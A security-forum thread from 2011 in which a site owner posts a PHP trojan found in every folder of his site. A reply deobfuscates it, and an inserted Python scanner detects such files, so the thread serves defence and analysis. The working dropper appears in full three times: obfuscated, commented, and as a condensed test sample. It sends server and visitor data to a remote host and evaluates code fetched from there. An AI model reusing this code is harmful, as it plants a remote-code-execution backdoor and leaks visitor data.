
Trojan.Script.473810 at my site

Discussion in 'Security' started by Nick252, Nov 4, 2011.

  1. #1
    I noticed that at my site, in all folders, there is a file with various names (116931.php, 12241.php, 28822.php) and all of them contain this code:

    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("dm1hcmtldC5pbmZv");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

    I uploaded the file to VirusTotal and the result is Trojan.Script.473810 or PHP:Small-AH [Trj].

    Does anyone know how to fix this and how to decode the file?
     
    Nick252, Nov 4, 2011
  2. DaringHost
    #2
    What type of website are you running?
    WordPress blogs are the most common software that I've seen hackers get into. If you are using WordPress and are using the latest version, I would check out what plugins you are using. They have also been known to open doors for exploits.
     
    DaringHost, Nov 7, 2011
  3. Just need it
    #3
    Well, here is what your file actually contains:

    <?
    	error_reporting(0);  // hide any warnings so the file runs silently
    	// collect details about the host, the request and the visitor
    	$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    	$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    	$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    	$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    	$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    	$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    	$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    	$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    	$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    	$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    	// all of it is base64-encoded into the query string that gets sent to the remote host
    	$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
    	$f="vmarket.info";  // base64_decode("dm1hcmtldC5pbmZv")
    	
    	// if the request carries the right "q" value, the "id" parameter replaces the remote host
    	if (basename($c)==basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a")
    		$f=$_REQUEST["id"];
    	// fetch code from http://7ads.<host>, then http://7.<host>, then http://71.<host> via curl,
    	// and eval() whatever comes back
    	if($c=file_get_contents("http://7ads.".$f.$z))
    		eval($c);
    	else if($c=file_get_contents("http://7.".$f.$z))
    		eval($c);
    	else
    	{
    		$cu=curl_init("http://71.".$f.$z);
    		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    		$o=curl_exec($cu);
    		curl_close($cu);
    		eval($o);
    	};
    	die();
     ?>
    As far as I have analysed the code, it is some kind of script that interacts with a file hosted on vmarket.com, loads some code from there and executes it locally. It also sends out all the server information and can receive data from the browser.
    It may be a simple script that loads something useful and required, or it may be a dangerous script that loads malicious code and executes it locally on your server; either way, I'd never want to have a backdoor on my server.
    After visiting the website vmarket.com I got to know about some spamming tactics; the guys over there are frauds. If they can't code a file without introducing a backdoor, then how do you think they can secure the backlink from your server? Also, who is responsible for the legitimacy of all the information sent out and received?
     
    Last edited: Nov 21, 2011
    Just need it, Nov 21, 2011
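The question in post #1 was how to find and decode these files, and post #3 shows what the decoded version looks like. The scanner below is an added example, not code from any poster in this thread: it walks a web root, flags PHP files that combine eval() with base64_decode() or curl_exec(), notes the all-digits file names the thread describes, and decodes every base64 literal so you can see which hosts a file talks to without running it. The sample file it writes is a constructed, condensed copy of the snippet from post #1 (same base64 literals); the directory layout and file names are assumptions.

```python
import base64
import os
import re
import tempfile
from pathlib import Path

# Indicators drawn from the snippet posted in this thread: an eval() fed by
# remote content, base64-obfuscated host names, error reporting switched off.
SUSPICIOUS_CALLS = ("eval(", "base64_decode(", "file_get_contents(",
                    "curl_exec(", "error_reporting(0)")
NUMERIC_PHP_NAME = re.compile(r"^\d+\.php$")  # 116931.php, 12241.php, ...
B64_LITERAL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')

# Constructed sample: a condensed copy of the dropper from post #1, keeping its
# real base64 literals so the decoder has something to reveal.
SAMPLE_DROPPER = (
    '<? error_reporting(0);$h=$_SERVER["REMOTE_ADDR"];$z="/?".base64_encode($h);'
    '$f=base64_decode("dm1hcmtldC5pbmZv");'
    'if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);'
    'else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);'
    '$o=curl_exec($cu);eval($o);};die(); ?>'
)
BENIGN_PAGE = '<?php echo "hello"; ?>'  # constructed control file, should not be flagged


def decode_literals(source: str) -> list[str]:
    """Plaintext of every base64_decode("...") literal in the file, in source order."""
    decoded = []
    for m in B64_LITERAL.finditer(source):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a subclass of ValueError
            decoded.append("<undecodable:%s>" % m.group(1))
    return decoded


def score_file(path: Path) -> dict:
    """Collect indicators for one PHP file; 'suspicious' needs eval() plus obfuscation or curl."""
    source = path.read_text(errors="replace")
    hits = [c for c in SUSPICIOUS_CALLS if c in source]
    return {
        "path": str(path),
        "numeric_name": bool(NUMERIC_PHP_NAME.match(path.name)),
        "indicators": hits,
        "decoded": decode_literals(source),
        "suspicious": "eval(" in hits and ("base64_decode(" in hits or "curl_exec(" in hits),
    }


def scan_webroot(root) -> list[dict]:
    """Walk every directory under root and return reports for the suspicious PHP files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                report = score_file(Path(dirpath) / name)
                if report["suspicious"]:
                    findings.append(report)
    return findings


def demo() -> list[dict]:
    """Build a throwaway web root with one dropper and one clean file, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()  # the thread reports a copy in every folder
        (root / "images" / "116931.php").write_text(SAMPLE_DROPPER)
        (root / "index.php").write_text(BENIGN_PAGE)
        return scan_webroot(root)


if __name__ == "__main__":
    for f in demo():
        print(f["path"], "numeric name:", f["numeric_name"])
        print("  indicators:", ", ".join(f["indicators"]))
        print("  decoded literals:", f["decoded"])
```

Run it against a copy of the real web root by calling scan_webroot("/path/to/htdocs"); the decoded literals are what to block at the outbound firewall, and every flagged file should be removed and the upload path that placed it (FTP credentials, a writable plugin directory) fixed, since the dropper itself is only the loader for whatever the remote host serves.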
  4. Nick252
    #4
    Thanks for your replies, I solved the problem by contacting my host.
     
    Nick252, Nov 22, 2011